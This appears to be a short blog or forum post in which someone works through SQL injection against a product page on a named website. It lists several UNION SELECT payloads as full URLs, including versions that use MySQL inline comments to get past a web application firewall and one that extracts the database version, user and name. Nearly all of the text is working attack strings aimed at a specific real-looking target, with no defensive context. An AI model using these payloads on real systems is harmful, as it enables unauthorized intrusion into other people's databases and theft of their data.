Code:http://fecker.co.uk/scooby/product.php?id=13+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--
It doesn't accept?
nulled out the id value
make it id=-13
so
http://fecker.co.uk/scooby/product.php?id=-13 /*!Union*/ /*!Select*/ 1,version(),user(),4,5,database(),7,8,9,10--+-
still the same, I guess to bypass the WAF,
~White's~ query woked that is this:
Code:
http://fecker.co.uk/scooby/product.php?id=-13 /*!Union*/ /*!Select*/ 1,version(),user(),4,5,database(),7,8,9,10--+-
but I don't want to be spoon fed, I really want to know, how this happened, the baiscs, I mean only the UNION+SELECT bypass I wanted not the whole database at once so that I get spoon feed'd
I figured out this query should be this
Code:
http://fecker.co.uk/scooby/product.php?id=-13%20/*!Union*/%20/*!Select*/%201,2,3,4,5,6,7,8,9,10--
Code:
http://fecker.co.uk/scooby/product.php?id=-13 /*!union*/ (select 1,2,3,4,5,6,7,8,9,10)--
This works perfectly ^^
0 comments:
Post a Comment